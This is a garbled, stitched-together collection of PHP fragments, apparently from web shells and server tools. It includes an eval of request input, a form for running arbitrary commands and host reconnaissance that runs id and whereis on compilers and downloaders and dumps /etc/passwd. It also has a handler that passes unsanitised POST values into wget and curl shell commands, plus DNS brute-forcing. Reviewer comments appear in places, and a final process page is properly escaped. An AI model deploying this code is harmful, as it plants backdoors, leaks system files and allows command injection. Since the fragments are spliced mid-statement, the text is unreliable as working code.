shell("dig +nocmd {$url} any +multiline +noall +answer"); break; case c7: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Execution Started!Please refer result section after this message'});</script>"; echo "<p><b>Bruteforcing DNS-Records for Domain {$url} </b></p>"; shell("sudo nmap -Pn -p 80 --script dns-brute {$url}|sed -e '1,4d'"); break; case c8: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Viewing DNS Records for {$url}!Please refer result section after this message'});</script>"; echo "<p><b>Viewing DNS Records for {$url} </b></p>"; shell("host -t any {$url}"); break; case c9: echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Tracing a chain of DNS Server to the source!Please refer result section after this message'});</script>"; echo "<p><b>Tracing a chain of DNS Server to the source </b></p>"; shell("dnstracer {$url}"); break; } } echo '</div> <footer> <div align="left"> <h3>Thank You!</h3> </div> </footer> </article><!-- end of styles article --> <h4 class="alert_success">Scan Succeeded </h4> '; }
$_shell_session->start(); header("Content-Type: text/html; charset=utf-8"); extract($_shell_session->getLocals(), EXTR_SKIP); // Disable all error reporting, otherwise it mess with the output. error_reporting(0); // Errors are handled with an error handler and a fatal error handler, because // exceptions are not catchable when evaluating code. register_shutdown_function('shutdown_handler'); set_error_handler('error_handler'); ob_start(['Session', 'scrubOutput']); eval($_shell_session->prependUseStatements($_shell_statement)); ob_end_flush(); $_shell_session->end($_shell_statement, get_defined_vars()); } session_start(); if (!isset($_SESSION["session"])) { $_SESSION["session"] = new Session(); } if (isset($_SESSION['token']) && $_GET['token'] === $_SESSION['token']) { // Append a semi-colon just in case the statement doen't have one. An extra // semi-colon makes no harm. shell($_GET["statement"] . ";", $_SESSION["session"]); } else { if (!isset($_SESSION['token'])) { syslog(LOG_ERR, 'Missing session token'); echo "Session token missing - Please reset your session."; } else { syslog(LOG_ERR, 'Mismatch session token.'); echo "Invalid session token - Please reset your session."; } }
/**
 * Build an HTML summary of the host this script runs on.
 *
 * The summary holds the script path, free and total disk space, PHP and Zend
 * versions, the safe_mode / disable_functions / open_basedir settings,
 * php_uname(), the output of `id`, the locations of gcc, perl, python, curl
 * and wget, and the contents of /etc/passwd.
 *
 * Reviewer note (detection): a web request that makes the web-server account
 * run `id` followed by `whereis gcc|perl|python|curl|wget` and then read
 * /etc/passwd is host reconnaissance. Process-creation and file-access
 * telemetry for the PHP worker is the place to alert on this sequence.
 *
 * @return string HTML fragment.
 */
function mostrarinformacion()
{
    // NOTE(review): `or` binds weaker than `=`, so $ruta receives only the
    // result of getcwd(); the '/' fallback is never assigned.
    $ruta = getcwd() or '/';
    if (!ini_get('safe_mode') or strtolower(ini_get('safe_mode')) == 'off') {
        $safemode = 'No';
    } else {
        $safemode = 'Si';
    }
    // Each dynamic value in this part is passed through htmlentities(); decodeSize() is defined elsewhere.
    $salida = '<b>' . htmlentities(__FILE__, ENT_QUOTES, 'UTF-8') . '</b><br><br> <b>'
        . htmlentities(decodeSize(disk_free_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b> / <b>'
        . htmlentities(decodeSize(disk_total_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b><br><br> <b>PHP:</b> '
        . htmlentities(phpversion(), ENT_QUOTES, 'UTF-8') . '<br><br> <b>Zend:</b> '
        . htmlentities(zend_version(), ENT_QUOTES, 'UTF-8') . '<br><br> <b>Safe_mode:</b> '
        . $safemode . '<br><br> <b>Funciones desactivadas:</b> '
        . htmlentities(ini_get('disable_functions'), ENT_QUOTES, 'UTF-8') . '<br><br> <b>Open basedir:</b> '
        . htmlentities(ini_get('open_basedir'), ENT_QUOTES, 'UTF-8') . '<br><br> <b>'
        . htmlentities(php_uname(), ENT_QUOTES, 'UTF-8') . '</b><br><br>';
    // Runs only when `id` returns something truthy; every command string here
    // is fixed. The second argument of shell() is not documented in this file.
    if ($id = shell('id', false)) {
        $salida .= '<b>' . htmlentities($id, ENT_QUOTES, 'UTF-8') . '</b><br><br> '
            . htmlentities(shell('whereis gcc', false), ENT_QUOTES, 'UTF-8') . '<br><br> '
            . htmlentities(shell('whereis perl', false), ENT_QUOTES, 'UTF-8') . '<br><br> '
            . htmlentities(shell('whereis python', false), ENT_QUOTES, 'UTF-8') . '<br><br> '
            . htmlentities(shell('whereis curl', false), ENT_QUOTES, 'UTF-8') . '<br><br> '
            . htmlentities(shell('whereis wget', false), ENT_QUOTES, 'UTF-8') . '<br><br> <br> ';
    }
    // NOTE(review): the /etc/passwd text is placed in the textarea without
    // HTML escaping, unlike the values above. leerarchivo() is defined elsewhere.
    if ($usuarios = leerarchivo('/etc/passwd')) {
        $salida .= '<b>/etc/passwd:</b><br> <textarea style="width:100%;" rows="10">' . $usuarios . '</textarea><br><br>';
    }
    return $salida;
}
shell(which('wget') . " " . $_POST['urldown'] . " -O " . $_POST['filename'] . ""); break; case fetch: shell(which('fetch') . " -o " . $_POST['filename'] . " -p " . $_POST['urldown'] . ""); break; case lynx: shell(which('lynx') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case links: shell(which('links') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case GET: shell(which('GET') . " " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case curl: shell(which('curl') . " " . $_POST['urldown'] . " -o " . $_POST['filename'] . ""); break; } } } } //Brute if ($action == 'brute') { function Brute() { global $action, $pass_de, $chars_de, $dat, $date; ignore_user_abort(1); } if ($chars_de == "") { $chars_de = ""; }
</td> <td width="25%" >Server time: <?php echo date('H:i d-m-Y'); ?> </td> </tr> </table> </td></tr></table> <table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;> <tr><th class=t align=left><b>Shell</b></th></tr> <tr><td class=contentb><center> <form action method=POST> <input type=hidden name="type" value=5> <textarea cols=150 rows=20 name="value"> <?php echo htmlspecialchars(shell()); ?> </textarea><?php echo edit(); ?> </form> <table border="0" width="100%"> <tr> <td width="50%" align="center"><form action method=POST> <b>Enter comand:</b> <input type=hidden name="type" value=2> <input type=text name="value" size=45><input type=submit value="Enter"> </form></td> <td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php echo pwd(); ?>
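<?php
// Process detail page: shows `ps -p <pid>` and the `pstree` below that pid.
//
// The pid is reduced to an integer and quoted before it reaches the shell.
// The command output contains process names and arguments, which are chosen
// by whoever started the process, so it is HTML-escaped before being echoed.
require __DIR__ . '/../../share/app.php';

try {
    // A missing parameter becomes 0 instead of raising an undefined-index notice.
    $pid = isset($_GET['pid']) ? intval($_GET['pid']) : 0;

    $out = shell(sprintf('ps -p %s', escapeshellarg($pid)));
    // ENT_SUBSTITUTE keeps the output visible when it contains invalid UTF-8.
    echo '<pre>', htmlspecialchars((string) $out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), '</pre>';

    $out = shell(sprintf('pstree -cl -p %s', escapeshellarg($pid)));
    echo '<pre>', htmlspecialchars((string) $out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), '</pre>';
} catch (Exception $exception) {
    echo '<pre class="alert alert-danger">', htmlspecialchars($exception->getMessage()), '</pre>';
}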